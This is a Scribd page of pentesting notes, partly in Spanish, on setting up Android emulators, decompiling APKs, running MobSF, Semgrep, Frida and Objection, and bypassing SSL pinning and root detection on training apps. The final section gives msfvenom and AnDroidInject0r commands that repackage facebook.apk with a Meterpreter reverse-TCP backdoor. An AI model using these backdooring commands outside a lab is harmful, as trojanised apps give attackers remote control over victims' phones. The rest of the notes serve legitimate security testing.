Scribd
Upload
110 views

1 - Preparing Our Emulation Environment: Android

This document provides instructions for setting up an emulation environment for Android application testing. It discusses installing Android Studio, Anbox, Genymotion and other emulation tools. It also summarizes steps for decompiling APK files, performing static and dynamic analysis using tools like MobSF, Frida and Objection, and demonstrates how to inject backdoors into unprotected APK files.

Uploaded by

Walter Ignacio Miranda Salazar
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
110 views

1 - Preparing Our Emulation Environment: Android

This document provides instructions for setting up an emulation environment for Android application testing. It discusses installing Android Studio, Anbox, Genymotion and other emulation tools. It also summarizes steps for decompiling APK files, performing static and dynamic analysis using tools like MobSF, Frida and Objection, and demonstrates how to inject backdoors into unprotected APK files.

Uploaded by

Walter Ignacio Miranda Salazar
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Android

1 - Preparing our emulation environment

Android Studio
https://developer.android.com/studio?hl=es-419&gclsrc=ds&gclsrc=ds
tar xvf android-studio-2020.3.1.24-linux.tar.gz
cd
./studio.sh

Anbox
sudo apt update
sudo apt install snapd
sudo snap install --beta --devmode anbox
sudo ln -s /snap/bin/anbox /usr/bin/anbox
anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity

sudo apt install adb


adb devices

emulator-5558 device

Genymotion
wget https://dl.genymotion.com/releases/genymotion-3.2.1/genymotion-3.2.1-linux_x64.bin
chmod +x genymotion-3.2.1-linux_x64.bin
./genymotion-3.2.1-linux_x64.bin

Creamos un dispositivo ejemplo: Huawei P30

adb
sudo apt install adb

Verificar los dispositivos android emulados.


adb devices

Instalar apk remotamente.


adb install Escritorio/watf-bank.apk

adb shell
cd /mnt/user/0/primary/Download
wget http://192.168.100.6/cacert.der

Fix internet: https://titanwolf.org/Network/Articles/Article?AID=52bd816e-


e5f2-4607-971f-639e51e23b20#gsc.tab=0

2 - Decompiling APK source code:


1/4
sudo apt install

1) apktool d example.apk

2) cp example.apk example.zip

CLASSES.dex: Este archivo contiene el codigo java, que sera interpretado por la maquina virtual de
android(dalkvid);

Decompiladores GUI

Jadx-GUI
sudo apt install jadx

Ghidra
sudo apt install ghida

3 - SAST and DAST ANALYSIS TOOLS


Mobile-Security-Framework-MobSF

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git


cd Mobile-Security-Framework-MobSF
sudo apt install wkhtmltopdf
sudo apt-get install python3-pip
sudo pip3 install -r requirements.txt
sudo apt-get install python3-venv
sudo ./setup.sh

cd mobsf/MobSF
adb devices

nano settings.py
ADB_BINARY = '/usr/lib/android-sdk/platform-tools/adb'
ANALYZER_IDENTIFIER = '192.168.56.101:5555'
cd Android/Mobile-Security-Framework-MobSF
sudo ./run.sh

RMS-Runtime-Mobile-Security
git clone https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security
sudo apt install npm
npm install -g rms-runtime-mobile-security
rms
http://127.0.0.1:5000/

aparoid

sudo apt-get install python3 python3-pip sqlite3 default-jre android-tools-adb gunicorn libmagic1
git clone https://github.com/stefan2200/aparoid
cd aparoid
python3 -m pip install --upgrade requirements.txt
./start.sh
http://0.0.0.0:7300/

2/4
Insider

git clone https://github.com/insidersec/insider/releases/tag/3.0.0


./insider -tech java -target ~/Android/watf-bank/ -security 20

Semgrep

python3 -m pip install semgrep


git clone https://github.com/returntocorp/semgrep-rules.git

Scan with rules locally


semgrep --config=/home/hernan/Web/Vulnerabilidades/SAST/semgrep-rules ~/Android/watf-bank/

Scan with rules online


semgrep --config="p/owasp-top-ten" ~/Android/watf-bank/

4) Pentesting with Frida and Objection

Frida
sudo pip3 install frida

Verificar procesos del dispositivo android


frida-ps -U

Download service frida:

frida-server-15.1.3-android-x86.xz
frida-server-15.1.3-android-x86_64.xz

Send the binary to the android device, give it permissions and run it.

adb push frida-server-15.1.3-android-x86 /data/local/tmp


adb shell chmod 777 /data/local/tmp/frida-server-15.1.3-android-x86
adb shell /data/local/tmp/frida-server-15.1.3-android-x86 &

Later we export a burpsuite certificate in our local and send it to the android device.

adb push cacert.der /data/local/tmp/cert-der.crt

Later we download this script that allows us to perform a Bypass SSL pinning and send it to the
android device.

https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

We run bypass

frida -U -f owasp.sat.agoat -l fridascript.js --no-pause

How to create symbolic link Script Frida

sudo ln -s /home/hernan/.local/bin/* /usr/bin/

3/4
Scripts JS

ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/
frida_scripts/default
ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/
frida_scripts/auxiliary
ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/
frida_scripts/others

Bypass Android Root Detection

frida -l '/home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/
frida_scripts/default/root_bypass.js' -U -f com.WaTF.WaTFBank --no-pause

frida -l '/home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/
frida_scripts/default/ssl_pinning_bypass.js' -U -f com.WaTF.WaTFBank --no-pause

Objection

Bypass SSLPinning:
objection --gadget owasp.sat.agoat explore
android sslpinning disable

5 ) Reverse Engineering implementing Backdoor on


unprotected APK.
Inject Backdoor en APK.

AnDroidInject0r

git clone https://github.com/yasserjanah/AnDroidInject0r.git


cd AnDroidInject0r/
chmod +x install_requirements.sh
./install_requirements.sh
python3 ./AndroidInject0r.py --apkfile facebook.apk
python3 ./AndroidInject0r.py --apkfile facebook.apk lhost=192.168.100.3 lport=4444

Inject backdoor msfvenom

sudo apt install zipalign


sudo apt install apksigner
msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp lhost=192.168.100.3 lport=4444 -o
test.apk

4/4

You might also like